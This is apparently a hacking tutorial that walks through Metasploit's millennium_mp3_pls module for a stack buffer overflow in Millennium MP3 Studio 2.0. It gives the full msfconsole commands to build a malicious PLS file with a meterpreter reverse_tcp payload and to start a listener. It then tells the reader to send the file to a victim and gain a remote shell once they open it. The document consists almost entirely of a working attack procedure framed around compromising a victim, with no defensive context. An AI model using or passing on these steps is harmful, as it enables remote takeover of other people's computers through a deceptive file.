This module exploits a stack-based buffer overflow in Millennium MP3 Studio 2.0. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio. This functionality has not been tested in this module.
Exploit Targets
Millennium MP3 Studio 2.0
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/millennium_mp3_pls
Msf exploit (millennium_mp3_pls)>set payload windows/meterpreter/reverse_tcp
Msf exploit (millennium_mp3_pls)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (millennium_mp3_pls)>exploit
After we successfully generate the malicious MP3 File, it will stored on your local computer
/root/.msf4/local/msf.pls
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
Now send your msf.pls files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.